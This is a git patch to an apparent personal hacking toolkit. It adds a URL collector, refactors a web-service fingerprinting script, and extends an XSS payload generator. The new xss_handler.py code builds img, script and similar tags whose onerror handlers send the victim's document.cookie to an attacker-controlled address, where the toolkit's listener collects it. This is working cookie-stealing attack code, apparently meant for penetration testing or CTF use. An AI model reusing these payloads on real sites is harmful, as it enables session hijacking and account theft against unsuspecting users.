From a086ddeb42b1fa068a1b4b0b21d6c5520372c6b6 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Tue, 22 Sep 2020 20:55:06 +0200 Subject: [PATCH] Some more xss payloads --- util.py | 40 ++++++++++++++++++++++++++++++++++++++++ web_service_finder.py | 20 ++++---------------- xss_handler.py | 25 +++++++++++++++++++++---- 3 files changed, 65 insertions(+), 20 deletions(-) mode change 100644 => 100755 util.py diff --git a/util.py b/util.py old mode 100644 new mode 100755 index eb1bd63..f201d25 --- a/util.py +++ b/util.py @@ -1,9 +1,14 @@ +#!/usr/bin/env python + import random import socket import netifaces as ni +import requests import sys import exif import PIL +import os +from bs4 import BeautifulSoup def getAddress(interface="tun0"): if not interface in ni.interfaces(): @@ -135,6 +140,22 @@ def exifImage(payload="", _in=None, _out=None, exif_t else: print("Invalid output argument.") +def collectUrls(input): + if not isinstance(input, BeautifulSoup): + input = BeautifulSoup(input, "html.parser") + + urls = set() + attrs = ["src","href"] + tags = ["a","link","script","img"] + + for tag in tags: + for e in input.find_all(tag): + for attr in attrs: + if e.has_attr(attr): + urls.add(e[attr]) + + return urls + if __name__ == "__main__": bin = sys.argv[0] if len(sys.argv) < 2: @@ -172,3 +193,22 @@ if __name__ == "__main__": _out = ".".join(_out[0:-1]) + "_exif." 
+ _out[-1] exifImage(payload, _in, _out, tag) + elif command == "collectUrls": + if len(sys.argv) < 3: + print("Usage: %s collectUrls <uri>" % bin) + else: + uri = sys.argv[2] + if os.path.isfile(uri): + data = open(uri,"r").read() + else: + res = requests.get(uri) + if res.status_code != 200: + print("%s returned: %d %s" % (uri, res.status_code, res.reason)) + exit() + data = res.text + for item in sorted(collectUrls(data)): + print(item) + elif command == "help": + print("Usage: %s [command]" % bin) + print("Available commands:") + print(" help, getAddress, pad, collectUrls, exifImage") diff --git a/web_service_finder.py b/web_service_finder.py index c21288c..18d5b3c 100644 --- a/web_service_finder.py +++ b/web_service_finder.py @@ -5,6 +5,7 @@ import sys import argparse import requests import urllib.parse +from hackingscripts import util from bs4 import BeautifulSoup class WebServicecFinder: @@ -108,19 +109,6 @@ class WebServicecFinder: return True return False - def collectUrls(self, soup): - urls = set() - attrs = ["src","href"] - tags = ["a","link","script","img"] - - for tag in tags: - for e in soup.find_all(tag): - for attr in attrs: - if e.has_attr(attr): - urls.add(e[attr]) - - return urls - def retrieveMoodleVersion(self, v): res = requests.get("https://docs.moodle.org/dev/Releases") soup = BeautifulSoup(res.text, "html.parser") @@ -158,9 +146,9 @@ class WebServicecFinder: moodle_pattern_1 = re.compile(r"^https://download.moodle.org/mobile\?version=(\d+)(&|$)") moodle_pattern_2 = re.compile(r"^https://docs.moodle.org/(\d+)/") litecart_pattern = re.compile(r"^https://www.litecart.net") - wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|block-library/style.min.css)\?ver=([0-9.]+)(&|$)") + wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)") - urls = self.collectUrls(soup) + urls = util.collectUrls(soup) for url in urls: 
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v))) self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10)) @@ -170,7 +158,7 @@ class WebServicecFinder: def analyseRobots(self): res = self.do_get("/robots.txt", allow_redirects=False) - if res.status_code in (301,302,404,403): + if res.status_code != 200: print("[-] robots.txt not found or inaccessible") return False diff --git a/xss_handler.py b/xss_handler.py index 09e569f..b8afdc8 100755 --- a/xss_handler.py +++ b/xss_handler.py @@ -6,12 +6,29 @@ import http.server import socketserver from http.server import HTTPServer, BaseHTTPRequestHandler -def generatePayload(type, address, port): - if type == "img": - return '' % (address, port) +def getCookieAddress(address, port): + if port == 80: + return "'http://%s/?x='+document.cookie" % address else: + return "'http://%s:%d/?x='+document.cookie" % (address, port) + +def generatePayload(type, address, port): + + payloads = [] + cookieAddress = getCookieAddress(address, port) + + media_tags = ["img","audio","video","image","body","script","object"] + if type in media_tags: + payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress)) + + if type == "script": + payloads.append('<script>document.location=%s</script>' % cookieAddress) + + if len(payloads) == 0: return None + return "\n".join(payloads) + class XssServer(BaseHTTPRequestHandler): def _set_headers(self): self.send_response(200) @@ -54,7 +71,7 @@ if __name__ == "__main__": payload = generatePayload(payload_type, local_address, listen_port) if not payload: - print("Unsupported payload type, choose one of: img") + print("Unsupported payload type") exit(1) print("Payload:")